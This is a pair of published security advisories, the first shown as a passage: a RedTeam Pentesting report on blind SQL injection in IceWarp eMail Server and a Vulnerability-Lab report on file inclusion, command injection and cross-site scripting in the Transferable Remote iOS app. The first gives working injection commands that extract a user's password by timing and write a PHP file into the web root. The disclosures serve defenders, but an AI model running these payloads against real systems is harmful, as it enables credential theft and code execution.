Agent:Smith
Jane:Doe
Joe:User
For other DBMS, blind SQL injection is a possibility. The following
example illustrates how a password for a certain user account is
retrieved on an installation of the IceWarp eMail server that uses a
recent version of MySQL for storing user account information:
$ time ./sql_inject.sh \
73aaafec4a8db27af49c4c43bca4ac13 user@example.com "" \
"1=0)) UNION SELECT 1,2,IF((SELECT COUNT(*) FROM users
WHERE U_Mailbox='user' AND U_Password LIKE 'a%'),SLEEP(5),1)-- "
real 0m0.334s
user 0m0.053s
sys 0m0.007s
[...]
$ time ./sql_inject.sh \
73aaafec4a8db27af49c4c43bca4ac13 user@example.com "" \
"1=0)) UNION SELECT 1,2,IF((SELECT COUNT(*) FROM users
WHERE U_Mailbox='user' AND U_Password LIKE 't%'),SLEEP(5),1)-- "
real 0m5.441s
user 0m0.037s
sys 0m0.013s
[...]
$ time ./sql_inject.sh \
73aaafec4a8db27af49c4c43bca4ac13 user@example.com "" \
"1=0)) UNION SELECT 1,2,IF((SELECT COUNT(*) FROM users
WHERE U_Mailbox='user' AND U_Password LIKE 'test'),SLEEP(5),1)-- "
real 0m5.418s
user 0m0.040s
sys 0m0.010s
Depending on the DBMS configuration, creation of arbitrary files and/or
code execution might also be possible. The following example illustrates
the creation of a PHP script within the web application's root directory
using the SELECT .. INTO DUMPFILE functionality provided by MySQL:
$ ./sql_inject.sh a3779402b23fa4acdcba6be907521acb user@example.com "" \
"1=0)) UNION SELECT '','','<?php phpinfo();?>'
INTO DUMPFILE 'c:/Program Files/Merak/html/webmail/phpinfo.php'-- "
Workaround
==========
None.
Fix
===
Upgrade to version 9.4.2.
Security Risk
=============
The risk of this vulnerability is estimated as high. Depending on the
IceWarp eMail Server configuration, and configuration of the DBMS used,
attackers authenticated to the web application can leverage it to
retrieve, for example, users' contacts, notes or journal entries, obtain
user credentials, and/or execute arbitrary code.
History
=======
2009-03-23 Vulnerabilities identified during a penetration test
2009-04-01 Meeting with customer and vendor
2009-04-28 CVE number assigned
2009-05-05 Vendor publishes fixed version
2009-05-05 Advisory released
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting is offering individual penetration tests, short
pentests, performed by a team of specialised IT-security experts.
Hereby, security weaknesses in company networks or products are
uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at
http://www.redteam-pentesting.de.
--
RedTeam Pentesting GmbH Tel.: +49 241 963-1300
Dennewartstr. 25-27 Fax : +49 241 963-1304
52068 Aachen http://www.redteam-pentesting.de/
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck
RedTeam Pentesting discovered a remote SQL injection vulnerability in the Groupware component of IceWarp WebMail Server version 9.4.1.
Benjamin Kunz Mejri/Transferable Remote 1.1 XSS / LFI / Command Injection ( na)
Title:
======
Transferable Remote v1.1 iPad iPhone - Multiple Web Vulnerabilities
Date:
=====
2013-02-09
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=863
VL-ID:
=====
863
Common Vulnerability Scoring System:
====================================
8.5
Introduction:
=============
Transferable is the easiest way to download photos from your iPhone, iPad or iPod Touch to your Mac or PC!
Transferable let`s you download your photos and albums using just a web browser - no need for iTunes or even
plugging your device in! As soon as the app launches it displays a web address, simply type this into a web
browser on your PC or Mac and you will be able to browse, download or upload photos and albums!
- Easy to use interface
- Wifi Transfer - iTunes not required
- Download single pictures or whole albums!
- Upload photos from your PC/Mac to your iPhone, iPad or iPod Touch
- Star your favorite photos for download
- No limit on number of photos that can be downloaded
- Works with any web browser - no installation required!
- View Thumbnails and full resolution pictures
- Download photos as a zip
Transferable requires a wifi connection and an iphone or ipad device with iOS.
(Copy of the Homepage: https://itunes.apple.com/us/app/transferable-pro-wifi-photo/id518154149)
Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the mobile Transferable Remote v1.01 app for the apple ipad & iphone.
Report-Timeline:
================
2013-02-09: Public Disclosure
Status:
========
Published
Affected Products:
==================
Apple AppStore
Product: Transferable Remote 1.01
Exploitation-Technique:
=======================
Remote
Severity:
=========
Critical
Details:
========
1.1
A local file include web vulnerability via POST request method is detected in the mobile Transferable Remote v1.01 app for the apple ipad & iphone.
The vulnerability allows remote attackers via POST method to inject local app webserver folders to request unauthorized local webserver files.
The vulnerbility is located in the downloadPhoto module of the webserver (http://192.168.0.10:80) when processing to load a manipulated
`assets-library` url parameter. The execution of the injected path or file request will occur when the attacker is processing to reload
to index listing of the affected module.
Exploitation of the web vulnerability does not require a privileged application user account (standard) or user interaction.
Successful exploitation of the vulnerability results in unauthorized path or file access via local file or path include attack.
Vulnerable Application(s):
[+] Transferable Remote v1.0 - ITunes or AppStore (Apple)
Vulnerable Module(s):
[+] downloadPhoto
Vulnerable Parameter(s):
[+] assets-library
Affected Module(s):
[+] Index Listing
1.2
A local command injection web vulnerability is detected in the mobile Transferable Remote v1.01 app for the apple ipad & iphone.
The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile application.
The vulnerbility is located in the index module when processing to load the ipad or iphone device name. Local attackers can change the
ipad or iphone device name to system specific commands and file/path requests to provoke the execution when processing to watch the index listing.
Exploitation of the web vulnerability does not require a privileged application user account (standard) or user interaction.
Successful exploitation of the vulnerability results unauthorized execution of system specific commands and path requests.
Vulnerable Application(s):
[+] Transferable Remote v1.0 - ITunes or AppStore (Apple)
Vulnerable Module(s):
[+] Index
Vulnerable Parameter(s):
[+] device name - iPad or iPone
Affected Module(s):
[+] Index Listing (Device Name)
1.3
A persistent input validation vulnerability is detected in the mobile Transferable Remote v1.01 app for the apple ipad & iphone.
The bug allows an attacker (remote) to implement/inject malicious script code on the application side (persistent) of the app web service.
The vulnerability is located in the downloadCollection module of the webserver (http://192.168.0.10:80) when processing to request
via POST manipulated name, ext and url parameters. The persistent script code will be executed out of the downloadcollection module listing.
Exploitation of the vulnerability requires low or medium user interaction and with low or medium privileged application user account.
Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web
attacks, persistent phishing or stable (persistent) certificate mail notification context manipulation.
Vulnerable Application(s):
[+] Transferable Remote v1.0 - ITunes or AppStore (Apple)
Vulnerable Module(s):
[+] downloadCollection
Vulnerable Parameter(s):
[+] url & ext
Affected Module(s):
[+] Index Listing (Device Name)
1.4
A non-persistent cross site scripting vulnerability is detected in the mobile Transferable Remote v1.01 app for the apple ipad & iphone.
The vulnerability allows remote attackers to form manipulated request to hijack employeerss, moderator or admin sessions via client side
browser attack.
The vulnerability is located in the appliance invalid Exception Handling module and the not secure parsed path & id variables.
Successful exploitation of the vulnerability result in account steal via client side session hijacking, client site phishing, or
client-side content request manipulation.
Vulnerable Application(s):
[+] Transferable Remote v1.0 - ITunes or AppStore (Apple)
Vulnerable Module(s):
[+] Index
Vulnerable Module(s):
[+] page and bound id
Affected Module(s):
[+] Exception Handling (Error) Listing
Proof of Concept:
=================
1.1
The local File Include web vulnerability can be exploited by remote attacker without required application user account (no password: standard)
and also without user interaction. For demonstration or reproduce ...
Local Path Include Vulnerability
PoC:
http://192.168.0.10/downloadPhoto/assets-library://[INCLUDE FILE, PATH OR URL]<(POST)
Reference(s):
http://192.168.0.10/downloadPhoto/
1.2
The command injection web vulnerability can be exploited by local attacker with required device application user account and with
low user interaction. For demonstration or reproduce ...
Command Injection via Devicename
PoC:
{"devcname":"IPad360 ¥337","devctype":"ipad","pro":"false"}
...
{"devcname":"[COMMAND INJECTION VIA DEVICENAME]","devctype":"ipad","pro":"false"<OR true;)}
Reference(s):
http://192.168.0.10/getSettings
http://192.168.0.10/
1.3
The persistent validation web vulnerability can be exploited by remote attackers with required application user account and with
low or medium user interaction. For demonstration or reproduce ...
POST Inject via Download marked (star) files
PoC: (POST)
input=%5B%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DF102FE64-1463-4150-8FF8-0A512E7EB278%26
ext%3DJPG%22%2C%22name%22%3A%22<[INJECTED SCRIPT CODE!]") <.JPG%22%2C%22search%22%3A%22<[INJECTED SCRIPT CODE!]") <JPG%22%7D%2C%7B%22url%22%3A%22
assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D7A40B84F-CE2A-40C7-87C9-C66927626F66%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0004.JPG%22%2C%22search
%22%3A%22IMG0004JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D11E8FF27-B3A4-46B9-B320-74EFBDF9760D%26ext%3DJPG%22%2C
%22name%22%3A%22IMG_0008.JPG%22%2C%22search%22%3A%22IMG0008JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG
%3Fid%3D8EC135C1-D1DF-458F-B7B5-75DF2EB87B06%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0010.JPG%22%2C%22search%22%3A%22IMG0010JPG%22%7D%2C%7B%22url
%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DAD9CA73F-1ED4-4708-83DB-AC27441D9CC5%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0011.JPG%22
%2C%22search%22%3A%22IMG0011JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D2DF297C4-1EC7-4B96-8B74-F4923AF9FBDA%26
ext%3DJPG%22%2C%22name%22%3A%22IMG_0012.JPG%22%2C%22search%22%3A%22IMG0012JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG
%3Fid%3D7A8B8F5B-B524-44E3-8C99-6DB2AB258E66%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0013.JPG%22%2C%22search%22%3A%22IMG0013JPG%22%7D%2C%7B%22url%22
%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D76E366E9-AAF2-41A5-8D9C-599F1242001D%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0014.JPG%22%2C%22
search%22%3A%22IMG0014JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D27000044-675B-4C67-A4ED-2EA38B8318E5%26ext%3D
JPG%22%2C%22name%22%3A%22IMG_0015.JPG%22%2C%22search%22%3A%22IMG0015JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D
4C0729AE-7BBC-4DC6-BDF4-62E7D48AE167%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0016.JPG%22%2C%22search%22%3A%22IMG0016JPG%22%7D%2C%7B%22url%22%3A%22
assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D5457AD21-66CD-4CF4-8F3E-1ACE66761742%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0017.JPG%22%2C%22search
%22%3A%22IMG0017JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DCA15604D-4344-4739-9B7D-4B2B87BFC04E%26ext%3DJPG%22
%2C%22name%22%3A%22IMG_0018.JPG%22%2C%22search%22%3A%22IMG0018JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D
20BDBEC2-3B0E-435E-87B5-5DF1228D8164%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0019.JPG%22%2C%22search%22%3A%22IMG0019JPG%22%7D%2C%7B%22url%22%3A%22
assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DD69EDCA7-632F-417B-895A-88B6900282EE%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0020.JPG%22%2C%22search
%22%3A%22IMG0020JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D0207435E-10A3-4F4E-8B49-05E891C4BC0A%26ext%3DJPG
%22%2C%22name%22%3A%22IMG_0021.JPG%22%2C%22search%22%3A%22IMG0021JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3F
id%3D4A9763CC-8EB3-4B12-802F-3C3E5A092CD2%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0022.JPG%22%2C%22search%22%3A%22IMG0022JPG%22%7D%2C%7B%22url%22
%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D5AF6F15B-6F68-48E8-9ACB-8D424A3C8AEB%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0023.JPG%22%2C
%22search%22%3A%22IMG0023JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D3477F60C-DD79-4022-B1FB-37F1038E89C2%26
ext%3DJPG%22%2C%22name%22%3A%22IMG_0024.JPG%22%2C%22search%22%3A%22IMG0024JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG
%3Fid%3D1A072B2E-8869-4845-A9DF-EB1C5BAA6728%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0025.JPG%22%2C%22search%22%3A%22IMG0025JPG%22%7D%2C%7B%22url
%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DA7611789-4D0B-42D0-91CA-8D268C0D9721%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0026.JPG%22
%2C%22search%22%3A%22IMG0026JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DF0D4C1E7-9318-46F3-A539-B2140BD5A10A%26
ext%3DJPG%22%2C%22name%22%3A%22IMG_0027.JPG%22%2C%22search%22%3A%22IMG0027JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG
%3Fid%3D2433465E-2C1E-4133-8FA0-D4800BF334A8%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0028.JPG%22%2C%22search%22%3A%22IMG0028JPG%22%7D%2C%7B%22url%22
%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D712872C7-7A34-452A-816D-57DB34ABD3F3%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0029.JPG%22%2C%22
search%22%3A%22IMG0029JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D3874F42F-5AB7-4E3E-8913-C5EAC4E9FED5%26ext%3D
JPG%22%2C%22name%22%3A%22IMG_0030.JPG%22%2C%22search%22%3A%22IMG0030JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D
6C2CA643-C80D-455C-BC35-3705E8EFAF3D%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0031.JPG%22%2C%22search%22%3A%22IMG0031JPG%22%7D%2C%7B%22url%22%3A%22
assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DDA8CE2BD-9F39-4037-B82A-DDFBF32D42C3%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0032.JPG%22%2C%22search
%22%3A%22IMG0032JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DCA7E8330-FB0B-4F04-8E78-899DA951F003%26ext%3DJPG%22
%2C%22name%22%3A%22IMG_0033.JPG%22%2C%22search%22%3A%22IMG0033JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D
B0D24A45-61B9-4181-B6C7-D5F012D2FC57%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0034.JPG%22%2C%22search%22%3A%22IMG0034JPG%22%7D%2C%7B%22url%22%3A%22
assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D012F05C9-AE5B-423B-AE00-A112FCBE9897%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0035.JPG%22%2C%22search
%22%3A%22IMG0035JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DD19E01E0-B803-4ACB-A2AE-259C1247916A%26ext%3DJPG
%22%2C%22name%22%3A%22IMG_0036.JPG%22%2C%22search%22%3A%22IMG0036JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid
%3DA9F743E5-9D18-4236-A666-AE890431F738%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0037.JPG%22%2C%22search%22%3A%22IMG0037JPG%22%7D%2C%7B%22url%22%3A
%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D970D6C1D-99F8-4B5B-963C-F60931B910A9%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0038.JPG%22%2C%22
search%22%3A%22IMG0038JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DDA5B327A-8016-4574-AF37-4AD9F13533B3%26ext
%3DJPG%22%2C%22name%22%3A%22IMG_0039.JPG%22%2C%22search%22%3A%22IMG0039JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG
%3Fid%3DAEE85816-B08F-44D2-8F21-18209C6A37EE%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0040.JPG%22%2C%22search%22%3A%22IMG0040JPG%22%7D%2C%7B%22url
%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DB3CBB8B4-1323-4EB6-A029-8C2D17FC9FDC%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0041.JPG%22
%2C%22search%22%3A%22IMG0041JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.PNG%3Fid%3D2C37BCB2-820C-4884-8126-5CD71FD4D7B6%26ext
%3DPNG%22%2C%22name%22%3A%22IMG_0042.PNG%22%2C%22search%22%3A%22IMG0042PNG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.PNG
%3Fid%3D7A039467-1507-4031-ACCD-F5E327763DB7%26ext%3DPNG%22%2C%22name%22%3A%22IMG_0043.PNG%22%2C%22search%22%3A%22IMG0043PNG%22%7D%2C%7B%22url
%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.PNG%3Fid%3D109F6B8A-1B7E-4371-AFBE-C58E924347C0%26ext%3DPNG%22%2C%22name%22%3A%22IMG_0044.PNG
%22%2C%22search%22%3A%22IMG0044PNG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.PNG%3Fid%3D870C9313-4069-41A2-A274-C37D29ED9D16%26ext
%3DPNG%22%2C%22name%22%3A%22IMG_0045.PNG%22%2C%22search%22%3A%22IMG0045PNG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG
%3Fid%3DAB71436A-9D20-4B18-92FB-F7E54293E082%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0007.JPG%22%2C%22search%22%3A%22IMG0007JPG%22%7D%2C%7B%22url
%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DA1611D33-B9C0-4F56-BFE0-F219AE129EAF%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0006.JPG
%22%2C%22search%22%3A%22IMG0006JPG%22%7D%5D
Reference(s):
http://192.168.0.10/downloadCollection
1.4
The client side cross site scripting web vulnerability can be exploited by remote attacker without privileged application user account and
with medium or high required user interaction. For demonstration or reproduce ...
Client Side Cross Site Scripting - Exception Handling
PoC:
http://137.168.0.10:15555/0/-x[CLIENT SIDE INJECTED SCRIPT CODE! XSS]
Manually steps to reproduce ...
1. Install the service application on your mobile ipad or iphone device
2. Start the software and open http://192.168.0.10:15555/
3. Include the following path `0/-1` to provoke the an invalid application error (Example: http://137.168.0.10:15555/0/-1)
4. The -1 will be displayed with the path in a script bound to the invalid value exception
5. Now, the attacker can include his script code and request the same script via GET again
6. The script will be executed on client side in the browser when processing to load the manipulated link
7. Successful reproduce ... done!
Reference(s):
http://137.168.0.10:15555/0/
http://137.168.0.10:15555/1/
http://137.168.0.10:15555/2
http://137.168.0.10:15555/3/
Risk:
=====
1.1
The security risk of the file include web vulnerability is estimated as critical.
1.2
The security risk of the local command inject vulnerability via devicename is estimated as high(-).
1.3
The security risk of the persistent input validation web vulnerability is estimated as medium(+).
1.4
The security risk of the client side cross site scripting web vulnerability is estimated as low(+).
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
Vulnerability Laboratory [Research Team] - Chokri Ben Achour (meister@vulnerability-lab.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
Copyright © 2012 | Vulnerability Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com
Transferable Remote version 1.1 for iPad and iPhone suffers from cross site scripting, remote command injection, and local file inclusion vulnerabilities.